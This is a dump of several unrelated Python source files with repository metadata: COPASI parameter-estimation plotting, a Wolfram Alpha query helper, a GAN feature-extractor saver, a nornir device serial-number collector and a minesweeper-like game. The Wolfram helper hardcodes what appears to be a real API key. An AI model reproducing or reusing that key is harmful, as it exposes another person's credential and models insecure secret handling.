(isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n solution = run_parameter_estimation(method='Current Solution Statistics')\n\n model = dm.getModel()\n\n exp_data = []\n sim_data = []\n\n for i in range(num_experiments):\n change_set = COPASI.DataObjectSet()\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n df = 
get_data_from_experiment(experiment, rename_headers=True)\n mapping = get_experiment_mapping(experiment)\n\n # set independent values for that experiment\n independent = mapping[mapping.type == 'independent']\n num_independent = independent.shape[0]\n for j in range(num_independent):\n name = independent.iloc[j].mapping\n cn = independent.iloc[j].cn\n value = df.iloc[0][name]\n obj = dm.getObject(COPASI.CCommonName(cn))\n if obj is not None:\n if cn.endswith('InitialConcentration'):\n obj.getObjectParent().setInitialConcentration(value)\n else:\n obj.getObjectParent().setInitialValue(value)\n change_set.append(obj)\n\n if change_set.size() > 0:\n model.updateInitialValues(change_set)\n\n for j in range(solution.shape[0]):\n name = solution.iloc[j].name\n value = solution.iloc[j].sol\n if np.isnan(value):\n continue\n affected = solution.iloc[j].affected\n if any(affected) and exp_name not in affected:\n continue\n\n basico.set_reaction_parameters(name, value=value)\n\n duration = df.iloc[-1].Time\n data = basico.run_time_course(duration=duration)\n\n exp_data.append(df)\n sim_data.append(data)\n\n return exp_data, sim_data\n\n\ndef plot_per_experiment(**kwargs):\n \"\"\"\n This function creates one figure per experiment defined, with plots of all dependent variables\n and their fit in it.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: array of tuples (fig, ax) for the figures created\n \"\"\"\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n exp_data, sim_data = get_simulation_results(**kwargs)\n\n for i in range(num_experiments):\n fig, ax = plt.subplots()\n cycler = plt.cycler(\"color\", plt.cm.tab20c.colors)()\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n mapping = get_experiment_mapping(experiment)\n ax.set_title(exp_name)\n\n # set independent values for that experiment\n dependent = mapping[mapping.type == 'dependent']\n\n num_dependent = dependent.shape[0]\n for j in range(num_dependent):\n nextval = next(cycler)['color']\n name = dependent.iloc[j].mapping\n if name not in sim_data[i].columns:\n name = name[1:-1]\n sim_data[i].reset_index().plot(x='Time', y=name,\n label=\"{0} Fit\".format(name), ax=ax, color=nextval)\n name = dependent.iloc[j].mapping\n exp_data[i].plot.scatter(x='Time', y=name, ax=ax, color=nextval,\n label='{0} Measured'.format(name))\n result.append((fig, ax))\n\n return result\n\n\ndef plot_per_dependent_variable(**kwargs):\n \"\"\"\n This function creates a figure for each dependent variable, with traces for all experiments.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: array of tuples (fig, ax) for each figure created\n \"\"\"\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = 
problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n exp_data, sim_data = get_simulation_results(**kwargs)\n\n dependent_variables = {}\n\n for i in range(num_experiments):\n experiment = experiments.getExperiment(i)\n mapping = get_experiment_mapping(experiment)\n\n # set independent values for that experiment\n dependent = mapping[mapping.type == 'dependent']\n num_dependent = dependent.shape[0]\n for j in range(num_dependent):\n name = dependent.iloc[j].mapping\n if name not in dependent_variables:\n dependent_variables[name] = []\n dependent_variables[name].append(i)\n\n for dependent in dependent_variables:\n fig, ax = plt.subplots()\n cycler = plt.cycler(\"color\", plt.cm.tab20c.colors)()\n ax.set_title(dependent)\n experiment_indices = dependent_variables[dependent]\n\n for i in experiment_indices:\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n nextval = next(cycler)['color']\n name = dependent\n if name not in sim_data[i].columns:\n name = name[1:-1]\n\n sim_data[i].reset_index().plot(x='Time', y=name,\n label=\"{0} Fit\".format(exp_name), ax=ax, color=nextval)\n exp_data[i].plot.scatter(x='Time', y=dependent, ax=ax, color=nextval,\n label='{0} Measured'.format(exp_name))\n result.append((fig, ax))\n\n return result\n", "repo_name": "sh15h4nk/basico", "sub_path": "basico/task_parameterestimation.py", "file_name": "task_parameterestimation.py", "file_ext": "py", "file_size_in_byte": 33202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "model_io.get_current_model", "line_number": 55, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 56, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 59, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 62, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 78, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 79, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 82, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 85, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 95, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 96, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 99, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 102, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 122, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 123, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 126, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 129, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 136, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 137, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 138, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 139, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 141, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 157, "usage_type": "attribute"}, {"api_name": 
"model_io.get_current_model", "line_number": 158, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 159, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 162, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 165, "usage_type": "attribute"}, {"api_name": "builtins.ValueError", "line_number": 169, "usage_type": "call"}, {"api_name": "builtins.ValueError", "line_number": 174, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "builtins.ValueError", "line_number": 234, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 277, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 281, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 294, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 299, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 328, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 332, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 335, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 338, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 376, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 425, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 429, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 449, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 470, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 473, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 477, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 487, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 495, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 499, "usage_type": "call"}, {"api_name": "COPASI.CFitItem", "line_number": 503, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 505, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 507, "usage_type": "call"}, {"api_name": "COPASI.CRootContainer.getKeyFactory", "line_number": 513, "usage_type": "call"}, {"api_name": "COPASI.CRootContainer", "line_number": 513, "usage_type": "attribute"}, 
{"api_name": "COPASI.CCopasiParameterGroup", "line_number": 524, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 548, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 551, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 560, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 573, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 578, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 579, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 580, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 581, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 582, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 583, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 584, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 585, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 586, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 587, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 589, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 618, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 619, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 621, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 623, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 625, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 628, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 633, "usage_type": "call"}, {"api_name": "os.path", "line_number": 633, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 641, "usage_type": "call"}, {"api_name": "COPASI.CExperimentFileInfo", "line_number": 643, "usage_type": "call"}, {"api_name": "COPASI.CTaskEnum", "line_number": 654, "usage_type": "attribute"}, {"api_name": "COPASI.CTaskEnum", "line_number": 656, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 662, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 665, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 669, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 735, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 736, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 739, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 748, "usage_type": "attribute"}, {"api_name": "COPASI.CCopasiMethod_TypeNameToEnum", "line_number": 761, "usage_type": "call"}, {"api_name": "COPASI.CCopasiTask", "line_number": 774, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 776, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage.getLastMessage", "line_number": 777, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage", "line_number": 777, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 781, "usage_type": "call"}, {"api_name": 
"COPASI.CCopasiMessage.getLastMessage", "line_number": 782, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage", "line_number": 782, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 801, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 804, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 807, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 810, "usage_type": "attribute"}, {"api_name": "COPASI.DataObjectSet", "line_number": 825, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 838, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 852, "usage_type": "call"}, {"api_name": "basico.set_reaction_parameters", "line_number": 858, "usage_type": "call"}, {"api_name": "basico.run_time_course", "line_number": 861, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 881, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 884, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 887, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 890, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 900, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 900, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cycler", "line_number": 901, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 901, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 901, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 937, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 940, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 943, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 946, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 971, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 971, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cycler", "line_number": 972, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 972, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 972, "usage_type": "attribute"}]} +{"seq_id": "41526284482", "text": "import wolframalpha\n\n\n\ndef Wolfram_ask(query):\n try:\n client = wolframalpha.Client(\"46WHPG-HXUK7P8KA5\")\n res = client.query(query)\n print (query)\n msg = next(res.results).text\n\n except:\n msg = \"Please re-phrase your request.\"\n return msg\n", "repo_name": "megasonu1000/FbAnimus_Python-3.6.5", "sub_path": "Skills/WolframSkill.py", "file_name": "WolframSkill.py", "file_ext": "py", "file_size_in_byte": 251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wolframalpha.Client", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "25600483905", "text": "import torch\nimport argparse\nfrom models.loss_criterions.loss_texture import LossTexture\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Testing script')\n parser.add_argument('model_name', type=str,\n choices=[\"vgg19\", \"vgg16\"],\n help=\"\"\"Name of the desured featire extractor:\n - vgg19, vgg16 : a variation of the style transfer \\\n feature developped in \\\n http://arxiv.org/abs/1703.06868\"\"\")\n 
parser.add_argument('--layers', type=int, nargs='*',\n help=\"For vgg models only. Layers to select. \\\n Default ones are 3, 4, 5.\", default=None)\n parser.add_argument('output_path', type=str,\n help=\"\"\"Path of the output feature extractor\"\"\")\n\n args = parser.parse_args()\n\n if args.model_name in [\"vgg19\", \"vgg16\"]:\n if args.layers is None:\n args.layers = [3, 4, 5]\n featureExtractor = LossTexture(torch.device(\"cpu\"),\n args.model_name,\n args.layers)\n featureExtractor.saveModel(args.output_path)\n else:\n raise AttributeError(args.model_name + \" not implemented yet\")\n", "repo_name": "facebookresearch/pytorch_GAN_zoo", "sub_path": "save_feature_extractor.py", "file_name": "save_feature_extractor.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1573, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "models.loss_criterions.loss_texture.LossTexture", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "38654531979", "text": "from nornir import InitNornir\nfrom nornir_utils.plugins.functions import print_result\nfrom nornir_netmiko import netmiko_send_command\nimport pandas\n\n# 加载config,创建一个nornir对象\n#- display device manuinfo | in NUMBER\nnr = InitNornir(config_file=\"config.yaml\")\n\noutputs = []\nsn_tables = []\n\n\ndef show_cmds(task):\n # Task类通过host属性,读取yaml配置,获取其中设备信息\n cmds = task.host.data['cmds']\n\n for cmd in cmds:\n # print(cmd)\n # Task类调用run方法,执行任务,如netmiko_send_command、write_file等插件\n result = task.run(netmiko_send_command, command_string=cmd)\n output = result.result\n #sn_number = (f'{output}'.replace(' ', '@')).split('@')[-1]\n sn_number = list(filter(None,output.split(' ')))[-2]\n hostname = f'{task.host.hostname}'\n print(hostname + ' ' + 'SN ' + sn_number)\n outputs.append(output)\n sn_table = [hostname, sn_number]\n sn_tables.append(sn_table)\n\n return outputs\n\n\nresults = nr.run(task=show_cmds)\nprint(results)\nprint_result(results)\ncolumns = ['hostname', 'Loop']\ntables = pandas.DataFrame(sn_tables, columns=columns)\nnamestr = 'host_Loop.xlsx'\ntables.to_excel(namestr, index=0)\nprint('{name} created!'.format(name=namestr))\n", "repo_name": "wangcongxing/NetOpsNornir", "sub_path": "inventory/host_sn.py", "file_name": "host_sn.py", "file_ext": "py", "file_size_in_byte": 1286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nornir.InitNornir", "line_number": 8, "usage_type": "call"}, {"api_name": "nornir_netmiko.netmiko_send_command", "line_number": 21, "usage_type": "argument"}, {"api_name": "nornir_utils.plugins.functions.print_result", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "8236350926", "text": "import ipywidgets as widgets\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom application.settings import Settings\nfrom ui.widgets import Widgets\n\n\nclass Game:\n CELL_OPEN_FLAG = 0\n BUTTON_INIT = None\n grid_buttons = None\n base_mask = None\n n_open_cells = 0\n\n def __init__(self, app_widgets: Widgets, settings: Settings):\n # initializing the basic properties\n\n self.matrix_size = app_widgets.matrix_size.value\n self.n_black_holes = app_widgets.n_black_holes.value\n 
self.settings = settings\n self.height = self.matrix_size\n self.width = self.matrix_size\n\n # defining a table, black holes, adjacent black holes cells, and buttons\n self.rows = self.find_exact_adjacent()\n self.generate_black_holes()\n self.calculate_adjacent_black_holes()\n self.get_base_mask()\n self.rows[\"cell_open\"] = self.CELL_OPEN_FLAG\n self.rows[\"button\"] = self.BUTTON_INIT\n self.rows.loc[self.base_mask, \"button\"] = self.rows.loc[self.base_mask].apply(\n lambda row: self.create_expanded_button(row), axis=1)\n\n # defining a grid of buttons\n self.grid_buttons = self.get_buttons()\n\n def get_base_mask(self):\n self.base_mask = (self.rows.primary_key == self.rows.adjacent)\n\n @staticmethod\n def find_all_potential_adjacent(elements_list):\n \"\"\"\n The function generates all potential adjacent cells\n :return:\n element - an array of all potential adjacent cells\n \"\"\"\n\n # getting the current row and column index, and the matrix width\n row, col, width = elements_list\n\n # generating all potential adjacent cells\n element = np.array([\n (row * width + 1 + col) - width - 1,\n (row * width + 1 + col) - width,\n (row * width + 1 + col) - width + 1,\n (row * width + 1 + col) - 1,\n (row * width + 1 + col),\n (row * width + 1 + col) + 1,\n (row * width + 1 + col) + width - 1,\n (row * width + 1 + col) + width,\n (row * width + 1 + col) + width + 1,\n ])\n\n return element\n\n def find_exact_adjacent(self):\n \"\"\"\n The function generates a table with cells information and theirs adjacent cells details\n :return:\n rows - pd.DataFrame, a table with columns:\n primary_key - an ordered id from 0 to self.matrix_size - 1\n adjacent - a vector of corresponding adjacent cells for the corresponding primary key\n \"\"\"\n\n # generating a table with primary keys, potential adjacent cells, and the matrix size as a constant\n rows = pd.DataFrame({\"primary_key\": np.repeat(np.arange(self.matrix_size), self.matrix_size),\n \"secondary_key\": np.tile(np.arange(self.matrix_size), self.matrix_size),\n \"size\": np.repeat(self.matrix_size, self.matrix_size ** 2)\n }, index=np.arange(self.matrix_size ** 2) + 1)\n\n # concatenating columns\n rows = pd.DataFrame(rows.apply(lambda x: (x[0], x[1], x[2]), axis=1).rename(\"adjacent\"))\n\n # finding all potential adjacent cells\n rows = rows.applymap(lambda x: self.find_all_potential_adjacent(x))\n\n # keeping only right adjacent cells\n end_inds = np.linspace(self.height, self.width * self.height, self.height, dtype=int)\n start_inds = np.linspace(1, self.width * self.height - (self.height - 1), self.width, dtype=int)\n rows.adjacent.loc[end_inds] = rows.loc[end_inds].adjacent.apply(lambda x: np.delete(x, [2, 5, 8]))\n rows.adjacent.loc[start_inds] = rows.loc[start_inds].adjacent.apply(lambda x: np.delete(x, [0, 3, 6]))\n\n # converting the column of arrays to the column of lists\n rows.adjacent = rows.adjacent.apply(lambda x: list(x))\n\n # resetting the index and exploding the variable\n rows = rows.reset_index().rename(columns={\"index\": \"primary_key\"})\n rows = rows.explode('adjacent')\n\n # keeping only visible values\n rows = rows[(rows.adjacent >= 1) & (rows.adjacent <= self.width * self.height)].reset_index(drop=True)\n\n return rows\n\n def generate_black_holes(self):\n \"\"\"\n The function generates black holes with the uniform distribution\n \"\"\"\n # generating random indexes of potential black holes\n black_holes_index = np.random.choice(self.rows[self.rows.primary_key == self.rows.adjacent].index.tolist(),\n 
size=self.n_black_holes,\n replace=False)\n\n # initializing a column and filling with black holes flag\n self.rows[\"black_holes\"] = 0\n self.rows.loc[black_holes_index, \"black_holes\"] = 1\n\n # sharing the information about black holes flags among their adjacent cells\n black_keys = self.rows.groupby([\"primary_key\"]).apply(\n lambda x: x.black_holes.sum()).rename(\"black_key\").reset_index()\n self.rows = pd.merge(self.rows, black_keys, on=[\"primary_key\"], how=\"inner\")\n\n def calculate_adjacent_black_holes(self):\n \"\"\"\n The function calculates a number of adjacent cells\n \"\"\"\n\n # calculating the sum of adjacent black holes\n adjacent_black_hole = self.rows.groupby([\"adjacent\"]).apply(lambda x: x.black_key.sum()).rename(\n \"adjacent_black_hole\").reset_index()\n self.rows = pd.merge(self.rows, adjacent_black_hole, on=[\"adjacent\"], how=\"inner\")\n self.rows = self.rows.sort_values(by=[\"primary_key\", \"adjacent\"]).reset_index(drop=True)\n\n def create_expanded_button(self, row):\n \"\"\"\n The function create a button for a cell\n :param row:\n :return:\n button - widgets.Button with special properties\n \"\"\"\n\n # extracting a number of a cell, a black hole flag, and a number of adjacent black holes\n number = row.primary_key\n black_hole = row.black_holes\n adjacent_bh = row.adjacent_black_hole\n\n # creating a button with its properties\n button = widgets.Button(\n tooltip=f\"{number}\",\n style={\"button_color\": self.settings.handle_color.get(\"WON\")},\n layout={\"height\": self.settings.cell.get(\"HEIGHT_CELL\"),\n \"width\": self.settings.cell.get(\"WIDTH_CELL\"),\n \"border\": self.settings.borders.get(\"CELL\"),\n })\n button.black_hole = bool(black_hole)\n button.adjacent_bh = adjacent_bh\n\n return button\n\n def plot_heatmap(self):\n \"\"\"\n This function plots a figure with # of adjacent black hole cells and black holes itself\n \"\"\"\n # defining # of adjacent black hole cells and black holes itself\n adjacent_black_holes_matrix = self.get_adjacent_holes_matrix()\n\n # plotting a figure\n plt.figure(figsize=(15, 8))\n sns.heatmap(adjacent_black_holes_matrix)\n plt.title(\"# of adjacent black hole cells and black holes\")\n plt.show()\n\n def get_adjacent_holes_matrix(self):\n \"\"\"\n This function convert the table to a matrix of # of adjacent black hole cells, and marks the black hole\n cell as -1\n :return:\n \"\"\"\n # defining a matrix whether a cell is black hole or not, and inverting 1 -> 0, and 0 -> 1\n black_holes_matrix = self.rows[self.rows.primary_key == self.rows.adjacent\n ].black_holes.values.reshape(self.height, self.width)\n black_holes_matrix_invert = np.logical_xor(black_holes_matrix, 1).astype(int)\n\n # defining a matrix of # adjacent black holes cells\n adjacent_black_holes_matrix = self.rows[self.rows.primary_key == self.rows.adjacent\n ].adjacent_black_hole.values.reshape(self.height, self.width)\n adjacent_black_holes_matrix = adjacent_black_holes_matrix * black_holes_matrix_invert + (\n -1 * black_holes_matrix)\n\n return adjacent_black_holes_matrix\n\n def get_buttons(self):\n \"\"\"\n This function extracts all buttons to a list\n :return:\n grid_buttons: a list of buttons\n \"\"\"\n grid_buttons = self.rows[self.rows.primary_key == self.rows.adjacent].button.values.reshape(-1).tolist()\n\n return grid_buttons\n\n def get_all_cells_to_open(self, number):\n \"\"\"\n This function finds all adjacent cells to open while clicking a specific cell\n :param number: a cell clicked\n :return:\n \"\"\"\n # defining a set of 
all buttons to be open and buttons with zero adjacent black hole cells\n all_cells_to_open = set()\n adjacent_open_cells = {number}\n\n # while there is any cells with zero adjacent black hole -> find adjacent cells\n while len(adjacent_open_cells) != 0:\n # only cells with zero adjacent black hole cells\n open_adj_cells_mask = (self.rows.primary_key.isin(adjacent_open_cells)) & (\n ~self.rows.adjacent.isin(adjacent_open_cells)) & (self.rows.adjacent_black_hole == 0)\n open_tmp_all_adj_cells_mask = (self.rows.primary_key.isin(adjacent_open_cells))\n\n # extracting new cells with zero adjacent black hole cells\n adjacent_open_cells = set(self.rows.loc[open_adj_cells_mask].adjacent.values.tolist())\n adjacent_open_cells = adjacent_open_cells.difference(all_cells_to_open)\n\n # all adjacent cells to cells with zero adjacent black hole cells\n all_adjacent_open_cells = self.rows.loc[open_tmp_all_adj_cells_mask].adjacent.values.tolist()\n all_cells_to_open.update(all_adjacent_open_cells)\n\n return all_cells_to_open\n\n def calculate_open_cells(self):\n \"\"\"\n This function calculates # of open cells\n :return:\n \"\"\"\n self.n_open_cells = self.rows.loc[self.base_mask, \"cell_open\"].sum()\n", "repo_name": "AntonLiutov/game_sapper_prototype", "sub_path": "application/simulate_data.py", "file_name": "simulate_data.py", "file_ext": "py", "file_size_in_byte": 10143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Widgets", "line_number": 17, "usage_type": "name"}, {"api_name": "application.settings.Settings", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 133, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": 
